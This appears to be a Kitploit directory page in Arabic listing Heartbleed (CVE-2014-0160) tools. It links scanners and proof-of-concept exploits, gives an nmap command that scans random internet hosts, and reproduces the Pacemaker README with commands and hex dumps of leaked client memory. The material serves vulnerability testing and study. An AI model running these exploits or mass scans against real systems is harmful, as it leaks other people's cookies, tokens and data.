Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2014-0160 — متغيرات Heartbleed | Kitploit
أدوات/GitHubGitHub/0x90/cve-2014-0160
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويبالاختبار العشوائيأمن الشبكاتالتشفيراختبار الاختراقالتعلم والتعليم
GitHub0x90/cve-2014-0160

CVE-2014-0160

متغيرات Heartbleed

عرض المستودع
813منذ 12 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2014-0160

الروابط

https://github.com/DisK0nn3cT/MaltegoHeartbleed

https://github.com/a0726h77/heartbleed-test

https://github.com/musalbas/heartbleed-masstest

https://github.com/decal/ssltest-stls

https://github.com/isgroup-srl/openmagic

https://github.com/offensive-python/HeartLeak

Nmap

nmap -sV -PS443 --open --script=ssl-heartbleed -iR 0

Cisco و DD-WRT

http://security.stackexchange.com/questions/55085/heartbleed-and-routers-asas-other

إثبات المفهوم (PoC)

أداة فحص (موقع وأداة) لـ CVE-2014-0160: https://github.com/FiloSottile/Heartbleed ssltest.py: توضيح سريع وغير متقن لـ CVE-2014-0160 بواسطة Jared Stafford http://pastebin.com/WmxzjkXJ

اختبار خادم SSL https://www.ssllabs.com/ssltest/index.html

وحدة Metasploit: https://github.com/rapid7/metasploit-framework/pull/3206/files

نص Nmap NSE: يكتشف ما إذا كان الخادم عرضة لـ Heartbleed في OpenSSL: https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse

نص Nmap NSE: غلاف OpenVAS nasl سريع وغير متقن لـ ssl_heartbleed بناءً على ssl_cert_expiry.nas https://gist.github.com/RealRancor/10140249

Heartbleeder: يختبر خوادمك لـ OpenSSL: https://github.com/titanous/heartbleeder?files=1

Heartbleed هجوم إثبات المفهوم وماسح شامل: https://bitbucket.org/fb1h2s/cve-2014-0160

نص فخ Heartbleed: http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt

Pacamaker

https://github.com/Lekensteyn/pacemaker

Pacemaker

Pacemaker

يحاول استغلال عملاء OpenSSL المعرضين لـ Heartbleed (CVE-2014-0160). متوافق مع Python 2 و 3.

هل أنا معرض للخطر؟

شغّل الخادم:

root@kitploit:~
python pacemaker.py

في عميلك، افتح https://localhost:4433/ (استبدل اسم المضيف إذا لزم الأمر). على سبيل المثال:

root@kitploit:~
curl https://localhost:4433/

سيفشل العميل دائمًا في الاتصال:

root@kitploit:~
curl: (35) Unknown SSL protocol error in connection to localhost:4433

إذا لم تكن معرضًا للخطر، سيخرج الخادم شيئًا مثل:

root@kitploit:~
Connection from: 127.0.0.1:40736
Possibly not vulnerable

إذا كنت معرضًا للخطر، سترى شيئًا مثل:

root@kitploit:~
Connection from: 127.0.0.1:40738
Client returned 65535 (0xffff) bytes
0000: 18 03 03 40 00 02 ff ff 2d 03 03 52 34 c6 6d 86  [email protected].
0010: 8d e8 40 97 da ee 7e 21 c4 1d 2e 9f e9 60 5f 05  ..@...~!.....`_.
0020: b0 ce af 7e b7 95 8c 33 42 3f d5 00 c0 30 00 00  ...~...3B?...0..
0030: 05 00 0f 00 01 01 00 00 00 00 00 00 00 00 00 00  ................
0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
*
4000: 00 00 00 00 00 18 03 03 40 00 00 00 00 00 00 00  ........@.......
8000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  .............@..
...
e440: 1d 2e 9f e9 60 5f 05 b0 ce af 7e b7 95 8c 33 42  ....`_....~...3B
e450: 3f d5 00 c0 30 00 00 05 00 0f 00 01 01 00 00 00  ?...0...........
fff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00     ...............

يتم دمج الأسطر اللاحقة المليئة ببايتات NUL في سطر واحد مع * بعد ذلك (مثل أداة xxd).

مثال حيث يتم تسريب ذاكرة أكثر "إثارة للاهتمام" باستخدام wget -O /dev/null https://google.com https://localhost:4433:

root@kitploit:~
Connection from: 127.0.0.1:41914
Client returned 65535 (0xffff) bytes
0000: 18 03 03 40 00 02 ff ff 2d 03 03 52 34 c6 6d 86  [email protected].
0010: 8d e8 40 97 da ee 7e 21 c4 1d 2e 9f e9 60 5f 05  ..@...~!.....`_.
0020: b0 ce af 7e b7 95 8c 33 42 3f d5 00 c0 30 00 00  ...~...3B?...0..
0030: 05 00 0f 00 01 01 65 0d 0a 43 6f 6e 74 65 6e 74  ......e..Content
0040: 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c  -Type: text/html
0050: 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d  ; charset=UTF-8.
...
0b50: 01 05 05 07 02 01 16 2d 68 74 74 70 73 3a 2f 2f  .......-https://
0b60: 77 77 77 2e 67 65 6f 74 72 75 73 74 2e 63 6f 6d  www.geotrust.com
0b70: 2f 72 65 73 6f 75 72 63 65 73 2f 72 65 70 6f 73  /resources/repos
0b80: 69 74 6f 72 79 30 0d 06 09 2a 86 48 86 f7 0d 01  itory0...*.H....
0b90: 01 05 05 00 03 81 81 00 76 e1 12 6e 4e 4b 16 12  ........v..nNK..
0ba0: 86 30 06 b2 81 08 cf f0 08 c7 c7 71 7e 66 ee c2  .0.........q~f..
0bb0: ed d4 3b 1f ff f0 f0 c8 4e d6 43 38 b0 b9 30 7d  ..;.....N.C8..0}
0bc0: 18 d0 55 83 a2 6a cb 36 11 9c e8 48 66 a3 6d 7f  ..U..j.6...Hf.m.
0bd0: b8 13 d4 47 fe 8b 5a 5c 73 fc ae d9 1b 32 19 38  ...G..Z\s....2.8
0be0: ab 97 34 14 aa 96 d2 eb a3 1c 14 08 49 b6 bb e5  ..4.........I...
0bf0: 91 ef 83 36 eb 1d 56 6f ca da bc 73 63 90 e4 7f  ...6..Vo...sc...
0c00: 7b 3e 22 cb 3d 07 ed 5f 38 74 9c e3 03 50 4e a1  {>".=.._8t...PN.
0c10: af 98 ee 61 f2 84 3f 12 00 00 00 00 00 00 00 00  ...a..?.........
0c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
*
4000: 00 00 00 00 00 18 03 03 40 00 00 00 00 00 00 00  ........@.......
...
ffd0: 00 00 00 00 5c d3 3c 02 00 00 00 00 49 53 4f 36  ....\.<.....ISO6
ffe0: 34 36 2d 53 45 2f 2f 00 53 45 4e 5f 38 35 30 32  46-SE//.SEN_8502
fff0: 30 30 5f 42 2f 2f 00 00 00 00 00 00 00 00 00     00_B//.........

الاستخدام المتقدم

شغّل ./pacemaker.py -h لمزيد من الخيارات. أهم الخيارات هي غالبًا -t (--timeout) و -x (--count). المهلة الافتراضية هي 3 ثوانٍ، وهي كافية لاستجابة معظم العملاء (ما لم يكن هناك رابط قمر صناعي أو ما شابه).

مثال للتحلي بمزيد من الصبر لكل نبضة قلب (5 ثوانٍ) والحصول على أربع استجابات نبضات قلب:

root@kitploit:~
./pacemaker.py -t 5 -x 4

نظريًا، يمكن لنبضات القلب أن تستغرق عشرين ثانية الآن، لكن عمليًا ستحصل على استجابات أسرع بكثير.

العملاء المختبرون

تم اختبار العملاء التاليين ضد OpenSSL 1.0.1f على Arch Linux وتسربت ذاكرتهم قبل المصافحة:

  • MariaDB 5.5.36
  • wget 1.15 (يسرب ذاكرة الاتصالات السابقة وحالته الخاصة)
  • curl 7.36.0 (https, FTP/IMAP/POP3/SMTP مع --ftp-ssl)
  • git 1.9.1 (اختبار clone / push، لا يسرب كثيرًا)
  • nginx 1.4.7 (في وضع الوكيل، يسرب ذاكرة الطلبات السابقة)
  • links 2.8 (يسرب محتويات الزيارات السابقة!)
  • KDE 4.12.4 (kioclient, Dolphin, اختبار https و ftps مع kde4-ftps-kio)
  • Exim 4.82 (SMTP الصادر)

links هو مثال رائع يوضح تأثير هذا الخلل على العملاء. إنه متصفح نصي يسرب تفاصيل بما في ذلك الرؤوس (الكوكيز، رموز التفويض) ومحتويات الصفحة.

ssltest.py

يحتوي هذا المستودع أيضًا على نسخة عاملة تستهدف الخوادم. تم إنشاء ssltest.py بواسطة Jared Stafford ([email protected])، وكل الفضل يعود له! تم استرجاعه من http://s3.jspenguin.org/ssltest.py.

في الوقت الحالي، النص متوافق فقط مع Python 2.

روابط

https://www.nccgroup.com/en/blog/2014/04/heartbleed-openssl-vulnerability/ https://www.mattslifebytes.com/?p=533 https://gist.github.com/takeshixx/10107280 https://github.com/FiloSottile/Heartbleed http://www.reddit.com/r/netsec/comments/22huui/python_heartbleed_cve20140160_proof_of_concept/

http://lab.onsec.ru/2014/04/memory-dumper-based-on-cve-2014-0160.html

تنزيل الأداة